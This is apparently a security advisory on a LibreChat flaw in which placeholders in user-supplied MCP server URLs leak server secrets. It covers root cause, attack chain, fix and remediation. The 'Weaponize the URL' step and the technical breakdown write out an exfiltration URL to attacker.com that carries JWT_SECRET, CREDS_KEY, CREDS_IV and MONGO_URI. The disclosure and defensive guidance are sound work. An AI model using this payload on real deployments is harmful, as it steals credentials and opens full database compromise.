LibreChat MCP Server URL Environment Variable Exfiltration
Authenticated users can weaponize ${VAR} placeholder resolution in user-supplied MCP server URLs to exfiltrate JWT_SECRET, CREDS_KEY/CREDS_IV, and MONGO_URI to an attacker-controlled domain
LibreChat versions up to and including 0.8.3 contain a critical information-disclosure flaw (CVE-2026-32625, CVSS 9.6) in its Model Context Protocol integration. Any authenticated user — no admin privileges required — can register a malicious MCP server URL containing ${JWT_SECRET}, ${CREDS_KEY}, ${CREDS_IV}, or ${MONGO_URI} placeholders. LibreChat's Zod validation resolves these against the server's own environment before connecting, transmitting the live secrets to an attacker-controlled domain. The blast radius is total: forged auth tokens, decrypted stored credentials, and direct database access. Fixed in v0.8.4-rc1, which strips env-var interpolation from user-supplied MCP URLs.
Technical Breakdown
LibreChat MCP Server URL Environment Variable Exfiltration
LibreChat's Model Context Protocol integration uses a Zod schema .transform(extractEnvVariable) that resolves ${VAR}-style placeholders in an MCP server URL against the server process's own process.env during validation. That transform was written for admin-managed YAML MCP configs, where interpolating trusted operator-supplied variable names is reasonable. The same schema, however, also validates input on POST /api/mcp/servers — a REST endpoint any authenticated user can call, admin or not. Submit a URL like http://attacker.com/?jwt=${JWT_SECRET}, and the validator resolves the live secret before LibreChat ever attempts the MCP handshake, sending it to the attacker's domain as part of connection/discovery.
Restrict MCP server registration to admin roles; enforce egress allowlisting; move secrets out of process.env
Root Cause
LibreChat's MCP integration uses a Zod schema .transform(extractEnvVariable) that resolves ${VAR}-style placeholders against the server process's process.env during validation of user-supplied MCP server URLs. This transform was intended only for admin-managed YAML MCP configs but was also applied to the REST API path that any authenticated user can hit, so untrusted input gets the same environment-variable substitution privilege as trusted config.
Vulnerable Pattern
A validation transform written for one trust boundary — admin-authored YAML parsed at startup — was reused verbatim on a second, lower-trust boundary — a REST endpoint any logged-in user can call. Zod's .transform() has no concept of caller identity, so it performs the same env-var interpolation regardless of who submitted the URL.
Why AI Services Are High-Value
LibreChat centralizes authentication secrets (JWT_SECRET), credential-encryption keys (CREDS_KEY/CREDS_IV), and the full database connection string (MONGO_URI) in one process's environment. That single-process concentration is exactly the blast-radius profile that makes AI chat/agent gateways a disproportionately high-value target compared to a typical web app leaking one scoped API key.
The Fix
Upgrade to v0.8.4-rc1, which strips environment-variable interpolation from user-supplied MCP server URLs — the extractEnvVariable transform is now scoped only to admin-managed YAML config parsing, never to REST API input from ordinary users.
Attack Chain
Recon — confirm MCP self-service is enabled
Attacker creates or authenticates a low-privilege account and probes whether the instance exposes user-facing MCP server registration rather than restricting it to admin-managed config.
Defensive note: Audit whether per-user MCP registration is active; log and alert on first-time MCP server registrations by non-admin accounts.
Weaponize the URL
Attacker builds a malicious MCP server URL like http://attacker.com/?jwt=${JWT_SECRET}&key=${CREDS_KEY}&iv=${CREDS_IV}&mongo=${MONGO_URI} and submits it via the authenticated MCP registration endpoint.
Defensive note: WAF/API-gateway rule flagging/blocking request bodies to MCP config endpoints containing ${ followed by uppercase env-var tokens.
Server-side resolution
LibreChat's Zod transform runs during validation, silently substituting placeholders with real process.env values, since the same transform used for trusted admin YAML also processes this untrusted REST input.
Defensive note: This is the code-level bug — detect via server-side logging of outbound MCP connection attempts containing resolved secret-shaped query strings.
Exfiltration
LibreChat's backend connects to the attacker-controlled URL as part of MCP handshake/discovery, delivering resolved secrets in the request.
Defensive note: Enforce egress allowlisting from the LibreChat host — the single most effective compensating control pre-patch.
Impact — full cryptographic and database compromise
With JWT_SECRET the attacker forges arbitrary session tokens; with CREDS_KEY/CREDS_IV they decrypt all stored credentials; with MONGO_URI they connect directly to the database.
Defensive note: Rotate all four secret classes and invalidate all sessions post-incident — a leaked JWT_SECRET requires full rotation and forced re-auth of every user.
Impact
Secrets baked into an LLM gateway's process environment control everything downstream — session integrity, encrypted-credential confidentiality, and the database of record. A leak here isn't contained to one feature; it collapses the platform's entire trust boundary.
Credential & Cryptographic Material Theft
- CREDS_KEY/CREDS_IV leakage allows offline decryption of every credential LibreChat has encrypted at rest
- JWT_SECRET leakage enables forging valid tokens for any user, including admins
- Once JWT_SECRET/CREDS_KEY/CREDS_IV are out, patching alone doesn't remediate already-stolen secrets
- Rotation must happen immediately post-patch — the exposure window covers every unrotated secret since first exploitation, not just future requests
Database Compromise
- MONGO_URI exposure grants direct access to the backing MongoDB, bypassing the app layer entirely
- Attacker can read all conversation history, user records, stored credentials, and config
- Write access could self-grant admin status via direct database modification
- Direct DB access bypasses application-layer audit logging, making the intrusion far harder to detect after the fact
Privilege Escalation via Low-Privilege Entry Point
- Requires only a standard authenticated account — no admin access needed
- Multi-tenant, open-signup, and broad-SSO deployments are especially exposed
- Combined with forged JWTs, an unprivileged attacker escalates to full admin control
- The entry point is the same self-service MCP registration flow legitimate users use daily, so malicious use blends into normal traffic patterns
Defensive Tutorial
Upgrade to LibreChat v0.8.4-rc1 or later
ImmediateRemoves env-var interpolation from user-supplied MCP URLs entirely — the actual fix, not a workaround substitute.
Rotate all four exposed secret classes now, assuming compromise
ImmediateRegenerate JWT_SECRET, CREDS_KEY, CREDS_IV, and rotate MongoDB credentials in MONGO_URI.
Grep MCP registration logs/DB for placeholder-injection attempts
ImmediateSearch for URLs matching \$\{[A-Z_]+\} (e.g. ${JWT_SECRET}, ${MONGO_URI}) to check for prior exploitation.
Disable non-admin MCP server registration if you can't patch same-day
ImmediateRestrict the endpoint to the admin role via reverse proxy/RBAC as a stopgap.
Enforce egress allowlisting from the LibreChat host
ImportantFirewall/NACL rules so the app can only reach explicitly approved MCP server domains.
Add a WAF/API-gateway rule blocking template syntax in MCP config bodies
ImportantBlock ${...} template syntax in MCP config request bodies as defense-in-depth on top of the patch.
Force re-authentication of all users after JWT_SECRET rotation
ImportantAudit admin account activity for the exposure window for signs of forged-token misuse.
Move secrets out of process.env into a dedicated secrets manager
ImportantVault or AWS Secrets Manager, with no code path that performs generic template interpolation against it.
Require security review for trusted-path logic reused on untrusted-path endpoints
ImportantAdd MCP/plugin-integration endpoints to SBOM/periodic security review scope, and require review for any schema .transform()/interpolation logic shared between trusted admin config and untrusted user-facing API input — this exact pattern is the recurring root cause here.
References
- NVD Entry CVE-2026-32625 — CVSS v3.1 vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N, base score 9.6.
- GitHub Security Advisory GHSA-4pcc-j6m6-wcwx — vendor advisory with patch details and disclosure timeline, credited to researcher YLChen-007.
- Vendor Changelog v0.8.4-rc1 changelog — release confirming the fix.
- CWE Reference CWE-200 — Exposure of Sensitive Information to an Unauthorized Actor